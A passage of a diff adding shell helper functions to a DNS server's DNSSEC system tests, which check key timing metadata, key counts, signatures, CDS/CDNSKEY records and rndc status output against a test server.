+check_timingmetadata() { + _dir="$DIR" + _zone="$ZONE" + _key_idpad=$(key_get "$1" ID) + _key_id=$(echo "$_key_idpad" | sed 's/^0\{0,4\}//') + _alg_num=$(key_get "$1" ALG_NUM) + _alg_numpad=$(printf "%03d" "$_alg_num") + + _published=$(key_get "$1" PUBLISHED) + _active=$(key_get "$1" ACTIVE) + _retired=$(key_get "$1" RETIRED) + _revoked=$(key_get "$1" REVOKED) + _removed=$(key_get "$1" REMOVED) + + _goal=$(key_get "$1" GOAL) + _state_dnskey=$(key_get "$1" STATE_DNSKEY) + _state_zrrsig=$(key_get "$1" STATE_ZRRSIG) + _state_krrsig=$(key_get "$1" STATE_KRRSIG) + _state_ds=$(key_get "$1" STATE_DS) + + _base_file=$(key_get "$1" BASEFILE) + _key_file="${_base_file}.key" + _private_file="${_base_file}.private" + _state_file="${_base_file}.state" + _legacy=$(key_get "$1" LEGACY) + _private=$(key_get "$1" PRIVATE) + + _published=$(key_get "$1" PUBLISHED) + _syncpublish=$(key_get "$1" SYNCPUBLISH) + _active=$(key_get "$1" ACTIVE) + _retired=$(key_get "$1" RETIRED) + _revoked=$(key_get "$1" REVOKED) + _removed=$(key_get "$1" REMOVED) + + # Check timing metadata. 
+ n=$((n+1)) + echo_i "check key timing metadata for key $1 id ${_key_id} zone ${ZONE} ($n)" + ret=0 + + if [ "$_published" = "none" ]; then + grep "; Publish:" "${_key_file}" > /dev/null && _log_error "unexpected publish comment in ${_key_file}" + if [ "$_private" = "yes" ]; then + grep "Publish:" "${_private_file}" > /dev/null && _log_error "unexpected publish in ${_private_file}" + fi + if [ "$_legacy" = "no" ]; then + grep "Published: " "${_state_file}" > /dev/null && _log_error "unexpected publish in ${_state_file}" + fi + else + grep "; Publish: $_published" "${_key_file}" > /dev/null || _log_error "mismatch publish comment in ${_key_file} (expected ${_published})" + if [ "$_private" = "yes" ]; then + grep "Publish: $_published" "${_private_file}" > /dev/null || _log_error "mismatch publish in ${_private_file} (expected ${_published})" + fi + if [ "$_legacy" = "no" ]; then + grep "Published: $_published" "${_state_file}" > /dev/null || _log_error "mismatch publish in ${_state_file} (expected ${_published})" + fi + fi + + if [ "$_syncpublish" = "none" ]; then + grep "; SyncPublish:" "${_key_file}" > /dev/null && _log_error "unexpected syncpublish comment in ${_key_file}" + if [ "$_private" = "yes" ]; then + grep "SyncPublish:" "${_private_file}" > /dev/null && _log_error "unexpected syncpublish in ${_private_file}" + fi + if [ "$_legacy" = "no" ]; then + grep "PublishCDS: " "${_state_file}" > /dev/null && _log_error "unexpected syncpublish in ${_state_file}" + fi + else + grep "; SyncPublish: $_syncpublish" "${_key_file}" > /dev/null || _log_error "mismatch syncpublish comment in ${_key_file} (expected ${_syncpublish})" + if [ "$_private" = "yes" ]; then + grep "SyncPublish: $_syncpublish" "${_private_file}" > /dev/null || _log_error "mismatch syncpublish in ${_private_file} (expected ${_syncpublish})" + fi + if [ "$_legacy" = "no" ]; then + grep "PublishCDS: $_syncpublish" "${_state_file}" > /dev/null || _log_error "mismatch syncpublish in ${_state_file} 
(expected ${_syncpublish})" + fi + fi + + if [ "$_active" = "none" ]; then + grep "; Activate:" "${_key_file}" > /dev/null && _log_error "unexpected active comment in ${_key_file}" + if [ "$_private" = "yes" ]; then + grep "Activate:" "${_private_file}" > /dev/null && _log_error "unexpected active in ${_private_file}" + fi + if [ "$_legacy" = "no" ]; then + grep "Active: " "${_state_file}" > /dev/null && _log_error "unexpected active in ${_state_file}" + fi + else + grep "; Activate: $_active" "${_key_file}" > /dev/null || _log_error "mismatch active comment in ${_key_file} (expected ${_active})" + if [ "$_private" = "yes" ]; then + grep "Activate: $_active" "${_private_file}" > /dev/null || _log_error "mismatch active in ${_private_file} (expected ${_active})" + fi + if [ "$_legacy" = "no" ]; then + grep "Active: $_active" "${_state_file}" > /dev/null || _log_error "mismatch active in ${_state_file} (expected ${_active})" + fi + fi + + if [ "$_retired" = "none" ]; then + grep "; Inactive:" "${_key_file}" > /dev/null && _log_error "unexpected retired comment in ${_key_file}" + if [ "$_private" = "yes" ]; then + grep "Inactive:" "${_private_file}" > /dev/null && _log_error "unexpected retired in ${_private_file}" + fi + if [ "$_legacy" = "no" ]; then + grep "Retired: " "${_state_file}" > /dev/null && _log_error "unexpected retired in ${_state_file}" + fi + else + grep "; Inactive: $_retired" "${_key_file}" > /dev/null || _log_error "mismatch retired comment in ${_key_file} (expected ${_retired})" + if [ "$_private" = "yes" ]; then + grep "Inactive: $_retired" "${_private_file}" > /dev/null || _log_error "mismatch retired in ${_private_file} (expected ${_retired})" + fi + if [ "$_legacy" = "no" ]; then + grep "Retired: $_retired" "${_state_file}" > /dev/null || _log_error "mismatch retired in ${_state_file} (expected ${_retired})" + fi + fi + + if [ "$_revoked" = "none" ]; then + grep "; Revoke:" "${_key_file}" > /dev/null && _log_error "unexpected revoked comment in 
${_key_file}" + if [ "$_private" = "yes" ]; then + grep "Revoke:" "${_private_file}" > /dev/null && _log_error "unexpected revoked in ${_private_file}" + fi + if [ "$_legacy" = "no" ]; then + grep "Revoked: " "${_state_file}" > /dev/null && _log_error "unexpected revoked in ${_state_file}" + fi + else + grep "; Revoke: $_revoked" "${_key_file}" > /dev/null || _log_error "mismatch revoked comment in ${_key_file} (expected ${_revoked})" + if [ "$_private" = "yes" ]; then + grep "Revoke: $_revoked" "${_private_file}" > /dev/null || _log_error "mismatch revoked in ${_private_file} (expected ${_revoked})" + fi + if [ "$_legacy" = "no" ]; then + grep "Revoked: $_revoked" "${_state_file}" > /dev/null || _log_error "mismatch revoked in ${_state_file} (expected ${_revoked})" + fi + fi + + if [ "$_removed" = "none" ]; then + grep "; Delete:" "${_key_file}" > /dev/null && _log_error "unexpected removed comment in ${_key_file}" + if [ "$_private" = "yes" ]; then + grep "Delete:" "${_private_file}" > /dev/null && _log_error "unexpected removed in ${_private_file}" + fi + if [ "$_legacy" = "no" ]; then + grep "Removed: " "${_state_file}" > /dev/null && _log_error "unexpected removed in ${_state_file}" + fi + else + grep "; Delete: $_removed" "${_key_file}" > /dev/null || _log_error "mismatch removed comment in ${_key_file} (expected ${_removed})" + if [ "$_private" = "yes" ]; then + grep "Delete: $_removed" "${_private_file}" > /dev/null || _log_error "mismatch removed in ${_private_file} (expected ${_removed})" + fi + if [ "$_legacy" = "no" ]; then + grep "Removed: $_removed" "${_state_file}" > /dev/null || _log_error "mismatch removed in ${_state_file} (expected ${_removed})" + fi + fi + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +check_keytimes() { + # The script relies on Python to set keytimes. 
+ if [ -x "$PYTHON" ]; then + + if [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + check_timingmetadata "KEY1" + fi + if [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + check_timingmetadata "KEY2" + fi + if [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + check_timingmetadata "KEY3" + fi + if [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + check_timingmetadata "KEY4" + fi + fi +} + +# Check the key with key id $1 and see if it is unused. +# This requires environment variables to be set. +# +# This will set the following environment variables for testing: +# BASE_FILE="${_dir}/K${_zone}.+${_alg_numpad}+${_key_idpad}" +# KEY_FILE="${BASE_FILE}.key" +# PRIVATE_FILE="${BASE_FILE}.private" +# STATE_FILE="${BASE_FILE}.state" +# KEY_ID=$(echo $1 | sed 's/^0\{0,4\}//') +key_unused() { + _dir=$DIR + _zone=$ZONE + _key_idpad=$1 + _key_id=$(echo "$_key_idpad" | sed 's/^0\{0,4\}//') + _alg_num=$2 + _alg_numpad=$(printf "%03d" "$_alg_num") + + BASE_FILE="${_dir}/K${_zone}.+${_alg_numpad}+${_key_idpad}" + KEY_FILE="${BASE_FILE}.key" + PRIVATE_FILE="${BASE_FILE}.private" + STATE_FILE="${BASE_FILE}.state" + KEY_ID="${_key_id}" + + test $_log -eq 1 && echo_i "key unused $KEY_ID?" + + # Check file existence. + [ -s "$KEY_FILE" ] || ret=1 + [ -s "$PRIVATE_FILE" ] || ret=1 + [ -s "$STATE_FILE" ] || ret=1 + [ "$ret" -eq 0 ] || return + + # Treat keys that have been removed from the zone as unused. + _check_removed=1 + grep "; Created:" "$KEY_FILE" > created.key-${KEY_ID}.test${n} || _check_removed=0 + grep "; Delete:" "$KEY_FILE" > unused.key-${KEY_ID}.test${n} || _check_removed=0 + if [ "$_check_removed" -eq 1 ]; then + _created=$(awk '{print $3}' < created.key-${KEY_ID}.test${n}) + _removed=$(awk '{print $3}' < unused.key-${KEY_ID}.test${n}) + [ "$_removed" -le "$_created" ] && return + fi + + # If no timing metadata is set, this key is unused. 
+ grep "; Publish:" "$KEY_FILE" > /dev/null && _log_error "unexpected publish comment in $KEY_FILE" + grep "; Activate:" "$KEY_FILE" > /dev/null && _log_error "unexpected active comment in $KEY_FILE" + grep "; Inactive:" "$KEY_FILE" > /dev/null && _log_error "unexpected retired comment in $KEY_FILE" + grep "; Revoke:" "$KEY_FILE" > /dev/null && _log_error "unexpected revoked comment in $KEY_FILE" + grep "; Delete:" "$KEY_FILE" > /dev/null && _log_error "unexpected removed comment in $KEY_FILE" + + grep "Publish:" "$PRIVATE_FILE" > /dev/null && _log_error "unexpected publish in $PRIVATE_FILE" + grep "Activate:" "$PRIVATE_FILE" > /dev/null && _log_error "unexpected active in $PRIVATE_FILE" + grep "Inactive:" "$PRIVATE_FILE" > /dev/null && _log_error "unexpected retired in $PRIVATE_FILE" + grep "Revoke:" "$PRIVATE_FILE" > /dev/null && _log_error "unexpected revoked in $PRIVATE_FILE" + grep "Delete:" "$PRIVATE_FILE" > /dev/null && _log_error "unexpected removed in $PRIVATE_FILE" + + grep "Published: " "$STATE_FILE" > /dev/null && _log_error "unexpected publish in $STATE_FILE" + grep "Active: " "$STATE_FILE" > /dev/null && _log_error "unexpected active in $STATE_FILE" + grep "Retired: " "$STATE_FILE" > /dev/null && _log_error "unexpected retired in $STATE_FILE" + grep "Revoked: " "$STATE_FILE" > /dev/null && _log_error "unexpected revoked in $STATE_FILE" + grep "Removed: " "$STATE_FILE" > /dev/null && _log_error "unexpected removed in $STATE_FILE" +} + +# Test: dnssec-verify zone $1. +dnssec_verify() +{ + n=$((n+1)) + echo_i "dnssec-verify zone ${ZONE} ($n)" + ret=0 + _dig_with_opts "$ZONE" "@${SERVER}" AXFR > dig.out.axfr.test$n || _log_error "dig ${ZONE} AXFR failed" + $VERIFY -z -o "$ZONE" dig.out.axfr.test$n > verify.out.$ZONE.test$n || _log_error "dnssec verify zone $ZONE failed" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Wait for the zone to be signed. +# The apex NSEC record indicates that it is signed. 
+_wait_for_nsec() { + _dig_with_opts "@${SERVER}" "$ZONE" NSEC > "dig.out.nsec.test$n" || return 1 + grep "NS SOA" "dig.out.nsec.test$n" > /dev/null || return 1 + grep "${ZONE}\..*IN.*RRSIG" "dig.out.nsec.test$n" > /dev/null || return 1 + return 0 +} +wait_for_nsec() { + n=$((n+1)) + ret=0 + echo_i "wait for ${ZONE} to be signed ($n)" + retry_quiet 10 _wait_for_nsec || _log_error "wait for ${ZONE} to be signed failed" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +check_numkeys() { + _numkeys=$(get_keyids "$DIR" "$ZONE" | wc -l) + test "$_numkeys" -eq "$NUM_KEYS" || return 1 + return 0 +} + +_check_keys() { + ret=0 + _ret=0 + + # Clear key ids. + key_set KEY1 ID "no" + key_set KEY2 ID "no" + key_set KEY3 ID "no" + key_set KEY4 ID "no" + + # Check key files. + _ids=$(get_keyids "$DIR" "$ZONE") + for _id in $_ids; do + # There are multiple key files with the same algorithm. + # Check them until a match is found. + ret=0 + echo_i "check key id $_id" + + if [ "no" = "$(key_get KEY1 ID)" ] && [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + ret=0 + check_key "KEY1" "$_id" + test "$ret" -eq 0 && key_save KEY1 && continue + fi + if [ "no" = "$(key_get KEY2 ID)" ] && [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + ret=0 + check_key "KEY2" "$_id" + test "$ret" -eq 0 && key_save KEY2 && continue + fi + if [ "no" = "$(key_get KEY3 ID)" ] && [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + ret=0 + check_key "KEY3" "$_id" + test "$ret" -eq 0 && key_save KEY3 && continue + fi + if [ "no" = "$(key_get KEY4 ID)" ] && [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + ret=0 + check_key "KEY4" "$_id" + test "$ret" -eq 0 && key_save KEY4 && continue + fi + + # This may be an unused key. Assume algorithm of KEY1. + ret=0 && key_unused "$_id" "$(key_get KEY1 ALG_NUM)" + test "$ret" -eq 0 && continue + + # If ret is still non-zero, none of the files matched. + echo_i "failed" + _ret=1 + done + + return $_ret +} + +# Check keys for a configured zone. This verifies: +# 1. 
The right number of keys exist in the key pool ($1). +# 2. The right number of keys is active. Checks KEY1, KEY2, KEY3, and KEY4. +# +# It is expected that KEY1, KEY2, KEY3, and KEY4 arrays are set correctly. +# Found key identifiers are stored in the right key array. +check_keys() { + n=$((n+1)) + echo_i "check keys are created for zone ${ZONE} ($n)" + ret=0 + + echo_i "check number of keys for zone ${ZONE} in dir ${DIR} ($n)" + retry_quiet 10 check_numkeys || ret=1 + if [ $ret -ne 0 ]; then + _numkeys=$(get_keyids "$DIR" "$ZONE" | wc -l) + _log_error "bad number of key files ($_numkeys) for zone $ZONE (expected $NUM_KEYS)" + status=$((status+ret)) + fi + + # Temporarily don't log errors because we are searching multiple files. + disable_logerror + + retry_quiet 3 _check_keys || ret=1 + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + + # Turn error logs on again. + enable_logerror + + ret=0 + if [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + echo_i "KEY1 ID $(key_get KEY1 ID)" + test "no" = "$(key_get KEY1 ID)" && _log_error "No KEY1 found for zone ${ZONE}" + fi + if [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + echo_i "KEY2 ID $(key_get KEY2 ID)" + test "no" = "$(key_get KEY2 ID)" && _log_error "No KEY2 found for zone ${ZONE}" + fi + if [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + echo_i "KEY3 ID $(key_get KEY3 ID)" + test "no" = "$(key_get KEY3 ID)" && _log_error "No KEY3 found for zone ${ZONE}" + fi + if [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + echo_i "KEY4 ID $(key_get KEY4 ID)" + test "no" = "$(key_get KEY4 ID)" && _log_error "No KEY4 found for zone ${ZONE}" + fi + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Call rndc dnssec -status on server $1 for zone $3 in view $4 with policy $2 +# and check output. This is a loose verification, it just tests if the right +# policy name is returned, and if all expected keys are listed. 
The rndc +# dnssec -status output also lists whether a key is published, +# used for signing, is retired, or is removed, and if not when +# it is scheduled to do so, and it shows the states for the various +# DNSSEC records. +check_dnssecstatus() { + _server=$1 + _policy=$2 + _zone=$3 + _view=$4 + + n=$((n+1)) + echo_i "check rndc dnssec -status output for ${_zone} (policy: $_policy) ($n)" + ret=0 + + _rndccmd $_server dnssec -status $_zone in $_view > rndc.dnssec.status.out.$_zone.$n || _log_error "rndc dnssec -status zone ${_zone} failed" + + if [ "$_policy" = "none" ]; then + grep "Zone does not have dnssec-policy" rndc.dnssec.status.out.$_zone.$n > /dev/null || log_error "bad dnssec status for unsigned zone ${_zone}" + else + grep "dnssec-policy: ${_policy}" rndc.dnssec.status.out.$_zone.$n > /dev/null || _log_error "bad dnssec status for signed zone ${_zone}" + if [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + grep "key: $(key_get KEY1 ID)" rndc.dnssec.status.out.$_zone.$n > /dev/null || _log_error "missing key $(key_get KEY1 ID) from dnssec status" + fi + if [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + grep "key: $(key_get KEY2 ID)" rndc.dnssec.status.out.$_zone.$n > /dev/null || _log_error "missing key $(key_get KEY2 ID) from dnssec status" + fi + if [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + grep "key: $(key_get KEY3 ID)" rndc.dnssec.status.out.$_zone.$n > /dev/null || _log_error "missing key $(key_get KEY3 ID) from dnssec status" + fi + if [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + grep "key: $(key_get KEY4 ID)" rndc.dnssec.status.out.$_zone.$n > /dev/null || _log_error "missing key $(key_get KEY4 ID) from dnssec status" + fi + fi + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Call rndc zonestatus on server $1 for zone $2 in view $3 and check output if +# inline-signing is enabled. 
+check_inlinesigning() { + _server=$1 + _zone=$2 + _view=$3 + + _rndccmd $_server zonestatus $_zone in $_view > rndc.zonestatus.out.$_zone.$n || return 1 + grep "inline signing: yes" rndc.zonestatus.out.$_zone.$n > /dev/null || return 1 +} + +# Call rndc zonestatus on server $1 for zone $2 in view $3 and check output if +# the zone is dynamic. +check_isdynamic() { + _server=$1 + _zone=$2 + _view=$3 + + _rndccmd $_server zonestatus $_zone in $_view > rndc.zonestatus.out.$_zone.$n || return 1 + grep "dynamic: yes" rndc.zonestatus.out.$_zone.$n > /dev/null || return 1 +} + +# Check if RRset of type $1 in file $2 is signed with the right keys. +# The right keys are the ones that expect a signature and matches the role $3. +_check_signatures() { + _qtype=$1 + _file=$2 + _role=$3 + + numsigs=0 + + if [ "$_role" = "KSK" ]; then + _expect_type=EXPECT_KRRSIG + elif [ "$_role" = "ZSK" ]; then + _expect_type=EXPECT_ZRRSIG + fi + + if [ "$(key_get KEY1 "$_expect_type")" = "yes" ] && [ "$(key_get KEY1 "$_role")" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY1 ID)$" > /dev/null || return 1 + numsigs=$((numsigs+1)) + elif [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY1 ID)$" > /dev/null && return 1 + fi + + if [ "$(key_get KEY2 "$_expect_type")" = "yes" ] && [ "$(key_get KEY2 "$_role")" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY2 ID)$" > /dev/null || return 1 + numsigs=$((numsigs+1)) + elif [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY2 ID)$" > /dev/null && return 1 + fi + + if [ "$(key_get KEY3 "$_expect_type")" = "yes" ] && [ "$(key_get KEY3 "$_role")" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY3 ID)$" > /dev/null || return 1 + numsigs=$((numsigs+1)) + elif [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | 
grep "^$(key_get KEY3 ID)$" > /dev/null && return 1 + fi + + if [ "$(key_get KEY4 "$_expect_type")" = "yes" ] && [ "$(key_get KEY4 "$_role")" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY4 ID)$" > /dev/null || return 1 + numsigs=$((numsigs+1)) + elif [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY4 ID)$" > /dev/null && return 1 + fi + + lines=$(get_keys_which_signed "${_qtype}" "${_file}" | wc -l) + test "$lines" -eq "$numsigs" || echo_i "bad number of signatures for $_qtype (got $lines, expected $numsigs)" + test "$lines" -eq "$numsigs" || return 1 + + return 0 +} +check_signatures() { + retry_quiet 3 _check_signatures $1 $2 $3 || _log_error "RRset $1 in zone $ZONE incorrectly signed" +} + +response_has_cds_for_key() ( + awk -v zone="${ZONE%%.}." \ + -v ttl="${DNSKEY_TTL}" \ + -v qtype="CDS" \ + -v keyid="$(key_get "${1}" ID)" \ + -v keyalg="$(key_get "${1}" ALG_NUM)" \ + -v hashalg="2" \ + 'BEGIN { ret=1; } + $1 == zone && $2 == ttl && $4 == qtype && $5 == keyid && $6 == keyalg && $7 == hashalg { ret=0; exit; } + END { exit ret; }' \ + "$2" +) + +response_has_cdnskey_for_key() ( + + awk -v zone="${ZONE%%.}." \ + -v ttl="${DNSKEY_TTL}" \ + -v qtype="CDNSKEY" \ + -v flags="$(key_get "${1}" FLAGS)" \ + -v keyalg="$(key_get "${1}" ALG_NUM)" \ + 'BEGIN { ret=1; } + $1 == zone && $2 == ttl && $4 == qtype && $5 == flags && $7 == keyalg { ret=0; exit; } + END { exit ret; }' \ + "$2" +) + +# Test CDS and CDNSKEY publication. 
+check_cds() { + + n=$((n+1)) + echo_i "check CDS and CDNSKEY rrset are signed correctly for zone ${ZONE} ($n)" + ret=0 + + _checksig=0 + + _dig_with_opts "$ZONE" "@${SERVER}" "CDS" > "dig.out.$DIR.test$n.cds" || _log_error "dig ${ZONE} CDS failed" + grep "status: NOERROR" "dig.out.$DIR.test$n.cds" > /dev/null || _log_error "mismatch status in DNS response" + + _dig_with_opts "$ZONE" "@${SERVER}" "CDNSKEY" > "dig.out.$DIR.test$n.cdnskey" || _log_error "dig ${ZONE} CDNSKEY failed" + grep "status: NOERROR" "dig.out.$DIR.test$n.cdnskey" > /dev/null || _log_error "mismatch status in DNS response" + + if [ "$CDS_DELETE" = "no" ]; then + grep "CDS.*0 0 0 00" "dig.out.$DIR.test$n.cds" > /dev/null && _log_error "unexpected CDS DELETE record in DNS response" + grep "CDNSKEY.*0 3 0 AA==" "dig.out.$DIR.test$n.cdnskey" > /dev/null && _log_error "unexpected CDNSKEY DELETE record in DNS response" + else + grep "CDS.*0 0 0 00" "dig.out.$DIR.test$n.cds" > /dev/null || _log_error "missing CDS DELETE record in DNS response" + grep "CDNSKEY.*0 3 0 AA==" "dig.out.$DIR.test$n.cdnskey" > /dev/null || _log_error "missing CDNSKEY DELETE record in DNS response" + _checksig=1 + fi + + if [ "$(key_get KEY1 STATE_DS)" = "rumoured" ] || [ "$(key_get KEY1 STATE_DS)" = "omnipresent" ]; then + response_has_cds_for_key KEY1 "dig.out.$DIR.test$n.cds" || _log_error "missing CDS record in response for key $(key_get KEY1 ID)" + response_has_cdnskey_for_key KEY1 "dig.out.$DIR.test$n.cdnskey" || _log_error "missing CDNSKEY record in response for key $(key_get KEY1 ID)" + _checksig=1 + elif [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + response_has_cds_for_key KEY1 "dig.out.$DIR.test$n.cds" && _log_error "unexpected CDS record in response for key $(key_get KEY1 ID)" + # KEY1 should not have an associated CDNSKEY, but there may be + # one for another key. Since the CDNSKEY has no field for key + # id, it is hard to check what key the CDNSKEY may belong to + # so let's skip this check for now. 
+ fi + + if [ "$(key_get KEY2 STATE_DS)" = "rumoured" ] || [ "$(key_get KEY2 STATE_DS)" = "omnipresent" ]; then + response_has_cds_for_key KEY2 "dig.out.$DIR.test$n.cds" || _log_error "missing CDS record in response for key $(key_get KEY2 ID)" + response_has_cdnskey_for_key KEY2 "dig.out.$DIR.test$n.cdnskey" || _log_error "missing CDNSKEY record in response for key $(key_get KEY2 ID)" + _checksig=1 + elif [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + response_has_cds_for_key KEY2 "dig.out.$DIR.test$n.cds" && _log_error "unexpected CDS record in response for key $(key_get KEY2 ID)" + # KEY2 should not have an associated CDNSKEY, but there may be + # one for another key. Since the CDNSKEY has no field for key + # id, it is hard to check what key the CDNSKEY may belong to + # so let's skip this check for now. + fi + + if [ "$(key_get KEY3 STATE_DS)" = "rumoured" ] || [ "$(key_get KEY3 STATE_DS)" = "omnipresent" ]; then + response_has_cds_for_key KEY3 "dig.out.$DIR.test$n.cds" || _log_error "missing CDS record in response for key $(key_get KEY3 ID)" + response_has_cdnskey_for_key KEY3 "dig.out.$DIR.test$n.cdnskey" || _log_error "missing CDNSKEY record in response for key $(key_get KEY3 ID)" + _checksig=1 + elif [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + response_has_cds_for_key KEY3 "dig.out.$DIR.test$n.cds" && _log_error "unexpected CDS record in response for key $(key_get KEY3 ID)" + # KEY3 should not have an associated CDNSKEY, but there may be + # one for another key. Since the CDNSKEY has no field for key + # id, it is hard to check what key the CDNSKEY may belong to + # so let's skip this check for now. 
+ fi + + if [ "$(key_get KEY4 STATE_DS)" = "rumoured" ] || [ "$(key_get KEY4 STATE_DS)" = "omnipresent" ]; then + response_has_cds_for_key KEY4 "dig.out.$DIR.test$n.cds" || _log_error "missing CDS record in response for key $(key_get KEY4 ID)" + response_has_cdnskey_for_key KEY4 "dig.out.$DIR.test$n.cdnskey" || _log_error "missing CDNSKEY record in response for key $(key_get KEY4 ID)" + _checksig=1 + elif [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + response_has_cds_for_key KEY4 "dig.out.$DIR.test$n.cds" && _log_error "unexpected CDS record in response for key $(key_get KEY4 ID)" + # KEY4 should not have an associated CDNSKEY, but there may be + # one for another key. Since the CDNSKEY has no field for key + # id, it is hard to check what key the CDNSKEY may belong to + # so let's skip this check for now. + fi + + test "$_checksig" -eq 0 || check_signatures "CDS" "dig.out.$DIR.test$n.cds" "KSK" + test "$_checksig" -eq 0 || check_signatures "CDNSKEY" "dig.out.$DIR.test$n.cdnskey" "KSK" + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +_find_dnskey() { + _owner="${ZONE}." + _alg="$(key_get $1 ALG_NUM)" + _flags="$(key_get $1 FLAGS)" + _key_file="$(key_get $1 BASEFILE).key" + + awk '$1 == "'"$_owner"'" && $2 == "'"$DNSKEY_TTL"'" && $3 == "IN" && $4 == "DNSKEY" && $5 == "'"$_flags"'" && $6 == "3" && $7 == "'"$_alg"'" { print $8 }' < "$_key_file" +} + + +# Test DNSKEY query. 
+_check_apex_dnskey() { + _dig_with_opts "$ZONE" "@${SERVER}" "DNSKEY" > "dig.out.$DIR.test$n" || return 1 + grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || return 1 + + _checksig=0 + + if [ "$(key_get KEY1 STATE_DNSKEY)" = "rumoured" ] || [ "$(key_get KEY1 STATE_DNSKEY)" = "omnipresent" ]; then + _pubkey=$(_find_dnskey KEY1) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null || return 1 + _checksig=1 + elif [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + _pubkey=$(_find_dnskey KEY1) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null && return 1 + fi + + if [ "$(key_get KEY2 STATE_DNSKEY)" = "rumoured" ] || [ "$(key_get KEY2 STATE_DNSKEY)" = "omnipresent" ]; then + _pubkey=$(_find_dnskey KEY2) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null || return 1 + _checksig=1 + elif [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + _pubkey=$(_find_dnskey KEY2) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null && return 1 + fi + + if [ "$(key_get KEY3 STATE_DNSKEY)" = "rumoured" ] || [ "$(key_get KEY3 STATE_DNSKEY)" = "omnipresent" ]; then + _pubkey=$(_find_dnskey KEY3) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null || return 1 + _checksig=1 + elif [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + _pubkey=$(_find_dnskey KEY3) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null && return 1 + fi + + if [ "$(key_get KEY4 STATE_DNSKEY)" = "rumoured" ] || [ "$(key_get KEY4 STATE_DNSKEY)" = "omnipresent" ]; then + _pubkey=$(_find_dnskey KEY4) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null || return 1 + _checksig=1 + elif [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + _pubkey=$(_find_dnskey KEY4) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null && return 1 + fi + + test "$_checksig" 
-eq 0 && return 0 + + _check_signatures "DNSKEY" "dig.out.$DIR.test$n" "KSK" || return 1 + + return 0 +} + +# Test the apex of a configured zone. This checks that the SOA and DNSKEY +# RRsets are signed correctly and with the appropriate keys. +check_apex() { + + # Test DNSKEY query. + n=$((n+1)) + echo_i "check DNSKEY rrset is signed correctly for zone ${ZONE} ($n)" + ret=0 + retry_quiet 10 _check_apex_dnskey || ret=1 + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + + # We retry the DNSKEY query for at most ten seconds to avoid test + # failures due to timing issues. If the DNSKEY query check passes this + # means the zone is resigned and further apex checks (SOA, CDS, CDNSKEY) + # don't need to be retried quietly. + + # Test SOA query. + n=$((n+1)) + echo_i "check SOA rrset is signed correctly for zone ${ZONE} ($n)" + ret=0 + _dig_with_opts "$ZONE" "@${SERVER}" "SOA" > "dig.out.$DIR.test$n" || _log_error "dig ${ZONE} SOA failed" + grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || _log_error "mismatch status in DNS response" + grep "${ZONE}\..*${DEFAULT_TTL}.*IN.*SOA.*" "dig.out.$DIR.test$n" > /dev/null || _log_error "missing SOA record in response" + check_signatures "SOA" "dig.out.$DIR.test$n" "ZSK" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + + # Test CDS and CDNSKEY publication. + check_cds +} + +# Test an RRset below the apex and verify it is signed correctly. 
